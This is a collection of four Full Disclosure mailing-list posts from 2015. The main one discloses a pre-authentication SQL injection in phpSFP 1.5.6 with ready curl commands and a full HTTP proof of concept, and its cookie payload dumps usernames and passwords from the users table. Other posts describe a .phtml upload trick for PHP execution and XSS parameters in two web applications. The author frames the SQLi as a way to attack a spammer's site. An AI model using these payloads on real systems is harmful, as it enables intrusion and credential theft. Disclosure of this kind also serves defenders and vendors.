[FD] phpSFP - Schedule Facebook Posts 1.5.6 Pre-auth SQL Injection (0-day)
## # _ ___ _ _ _ _ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_\___/|_| \_|\|\/_/ \_\_| # # phpSFP - Schedule Facebook Posts 1.5.6 Pre-auth SQL Injection (0-day) # Website : http://codecanyon.net/item/phpsfp-schedule-facebook-posts/5177393 # Exploit Author : @u0x (Pichaya Morimoto) # Release dates : April 2, 2015 # # Special Thanks to 2600 Thailand group: # xelenonz, pe3z, anidear, windows98se, icheernoom, penguinarmy # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # [+] Description phpSFP – is a Platform where you can easily manage your scheduling for all your (Facebook) pages & groups in one place. It helps to send messages, ads, events, news and so on. phpSFP is pretty popular more than its sale record thanks to nulled group (underground WebApp license crackers). [+] Background <3 I managed to track down a group of Vietnam-based Facebook spammer which posted ads on many FB groups I'm joined. And ended up with a website that is modified version (all phpSFP credits are removed) of phpSFP 1.4.1. so I did some matching and found the original application is phpSFP. Guess what happens when spammer mess up with offsec guy ;) [+] Exploit There are many possible ways to do SQLi, I will go with error-based which enabled by default on phpSFP xD $ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or extractvalue(rand(),concat(0x2e,user())) or '1|||1" in case you don't know, for further queries you have to change 'user()' to something else, e.g. $ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or extractvalue(rand(),concat(0x2e,(select concat_ws(0x3a,username,password) from users limit 1))) or '1|||2" don't forgot to do length()/substr() stuffs due to limitation of 32 characters in error message [+] Proof-of-Concept PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 GET /index.php/login HTTP/1.1 Host: 192.168.33.103 Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8 Cookie: login=1|||1' or extractvalue(rand(),concat(0x2e,(select concat_ws(0x3a,username,password) from users limit 1))) or '1|||2 HTTP/1.1 500 Internal Server Error Server: Apache/2.4.7 (Ubuntu) Date: Thu, 02 Apr 2015 13:15:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Set-Cookie: ci_session=; expires=Sat, 01-Apr-2017 13:15:08 GMT; Max-Age=63072000; path=/ Content-Length: 838 Database Error
Re: [FD] Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Hello Folks, You can get php execution by using the file extension .phtml for both of these advisories. I'm currently updating the advisories and the vendor. Try using an uncommon extension not defined in /etc/mime.types. $ grep "#app" /etc/mime.types #application/vnd.ms-pki.stl stl #application/x-httpd-eruby rhtml #application/x-httpd-phpphtml pht php #application/x-httpd-php-source phps #application/x-httpd-php3 php3 #application/x-httpd-php3-preprocessed php3p #application/x-httpd-php4 php4 #application/x-httpd-php5 php5 > On Mar 31, 2015, at 9:54 PM, Larry W. Cashdollar wrote: > > Title: Remote file upload vulnerability in > videowhisper-video-conference-integration wordpress plugin v4.91.8 > Author: Larry W. Cashdollar, @_larry0 > Date: 2015-03-29 > Download Site: > https://wordpress.org/support/plugin/videowhisper-video-conference-integration > Vendor: http://www.videowhisper.com/ > Vendor Notified: 2015-03-31, won’t fix. > http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822 > Vendor Contact: http://www.videowhisper.com/tickets_submit.php > Advisory: http://www.vapid.dhs.org/advisory.php?v=116 > Description: From their site "VideoWhisper Video Conference is a modern web > based multiple way video chat and real time file sharing tool. Read more on > WordPress Video Conference plugin home page." ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Proverbs Web Calendar 2.1.2 XSS (Cross-site Scripting) Security Vulnerabilities
*Proverbs Web Calendar 2.1.2 XSS (Cross-site Scripting) Security Vulnerabilities* Exploit Title: Proverbs Web Calendar /calendar.php Multiple Parameters XSS (Cross-site Scripting) Security Vulnerabilities Vendor: Proverbs Product: Proverbs Web Calendar Vulnerable Versions: 1.0.0 1.1 1.2.2 2.1 2.1.2 Tested Version: 1.2.2 2.1 Advisory Publication: April 03, 2015 Latest Update: April 03, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore] *Suggestion Details:* *(1) Vendor & Product Description:* *Vendor:* Proverbs *Product & Vulnerable Versions:* Proverbs Web Calendar 1.0.0 1.1 1.2.2 2.1 2.1.2 *Vendor URL:* http://www.proverbs.biz/ *Download:* Proverbs Web Calendar can be obtained from here, http://www.proverbsllc.com/demos/calendar/calendar.php http://www.hotscripts.com/listing/proverbs-web-calendar/ http://www.c-point.com/free_php_scripts/calendar.php http://www.html.it/articoli/proverbs-php-web-calendar-v-100-1/ *Product Introduction Overview:* "This is a web event calendar developed using PHP and powered by MySQL. The calendar is viewed in month format initially with a detailed view of daily events as each calendar day is clicked on. The calendar is customizable within a single file; allowing changes to the title, color choices, calendar language, starting day of the week, time format(24hr/12hr), time zone display and more" *(2) Vulnerability Details:* Proverbs Web Calendar web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Several Proverbs Web Calendar products 0-day vulnerabilities have been found by some other bug hunter researchers before. Proverbs has patched some of them. The milw00rm.com is archive of exploits, videos, papers and vulnerabilities. It has published suggestions, advisories, solutions details related to Proverbs Web Calendar vulnerabilities. *(2.1)* The first code programming flaw occurs at "/calendar.php" page with "&day", "&month" and "&year" parameters. *References:* http://www.tetraph.com/security/xss-vulnerability/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/04/proverbs-web-calendar-212-xss-cross.html http://www.inzeed.com/kaleidoscope/computer-web-security/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/ https://hackertopic.wordpress.com/2015/04/02/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/ http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=142576259903051&w=2 http://packetstormsecurity.com/files/130856/724CMS-5.01-4.59-4.01-3.01-Cross-Site-Scripting.html https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01737.html http://milw00rm.com/exploits/7076 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities
*6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities* Exploit Title: 6kbbs XSS (Cross-site Scripting) Security Vulnerabilities Vendor: 6kbbs Product: 6kbbs Vulnerable Versions: v7.1 v8.0 Tested Version: v7.1 v8.0 Advisory Publication: April 02, 2015 Latest Update: April 02, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore] *Suggestion Details:* *(1) Vendor & Product Description:* *Vendor:* 6kbbs *Product & Vulnerable Versions:* 6kbbs v7.1 v8.0 *Vendor URL & download:* 6kbbs can be obtained from here, http://www.6kbbs.com/download.html http://code.google.com/p/6kbbs/downloads/list *Product Introduction Overview:* "6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the code simple, easy to use, powerful, fast and so on. It is an excellent community forum program. The program is simple but not simple; fast, small; Interface generous and good scalability; functional and practical pursuing superior performance, good interface, the user's preferred utility functions." "1, using XHTML + CSS architecture, so that the structure of the page, saving transmission static page code, but also easy to modify the interface, more in line with WEB standards; 2, the Forum adopted Cookies, Session, Application and other technical data cache on the forum, reducing access to the database to improve the performance of the Forum. Can carry more users simultaneously access; 3, the data points table function, reduce the burden on the amount of data when accessing the database; 4, support for multi-skin style switching function; 5, the use of RSS technology to support subscriptions forum posts, recent posts, user's posts; 6, the display frame mode + tablet mode, the user can choose according to their own preferences to; 7. forum page optimization keyword search, so the forum more easily indexed by search engines; 8, extension, for our friends to provide a forum for a broad expansion of space services; 9, webmasters can add different top and bottom of the ad, depending on the layout; 10, post using HTML + UBB way the two editors, mutual conversion, compatible with each other; ..." *(2) Vulnerability Details:* 6kbbs web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Several 6kbbs products 0-day vulnerabilities have been found by some other bug hunter researchers before. 6kbbs has patched some of them. The milw00rm.com is archive of exploits, videos, papers and vulnerabilities. It has published suggestions, advisories, solutions details related to 6kbbs vulnerabilities. *(2.1)* The first code programming flaw occurs atoccurs at "/userlist.php?" page with "&orderby" parameter. *References:* http://www.tetraph.com/security/xss-vulnerability/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.sg/2015/04/6kbbs-v80-xss-cross-site-scripting.html?view=sidebar http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/ https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/ http://marc.info/?a=139222176300014&r=1&w=4 http://packetstormsecurity.com/files/authors/11717 https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01759.html http://milw00rm.com/exploits/6673 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/